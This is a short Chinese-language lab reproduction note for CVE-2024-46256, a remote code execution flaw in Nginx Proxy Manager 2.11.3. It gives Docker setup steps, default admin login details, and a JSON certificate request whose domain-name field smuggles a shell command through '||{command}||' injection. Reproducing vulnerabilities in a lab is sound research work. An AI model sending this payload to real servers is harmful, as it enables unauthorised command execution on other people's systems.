docker-compose up -d
或者可以使用自动化脚本:
python setup_environment.py
URL: http://localhost:81
完成初始配置后进行测试
使用默认管理员账户登录(邮箱:[email protected] / 密码:changeme)
确认证书签发相关功能的访问权限
CVE ID: CVE-2024-46256
产品: Nginx Proxy Manager
版本: 2.11.3
漏洞类型: 远程代码执行(RCE)
CVSS: 严重
PoC 利用已认证用户在证书签发(例如 Let's Encrypt)请求过程中,对域名字段进行模板/命令注入,从而触发 RCE。
示例载荷(概念示例):
{
"domain_names": ["test.com\"||{command}||\\n test.com\""],
"meta": {
"dns_challenge": false,
"letsencrypt_agree": true,
"letsencrypt_email": "[email protected]"
},
"provider": "letsencrypt"
}
OS: Windows 10
Docker: 最新版本
Nginx Proxy Manager: 2.11.3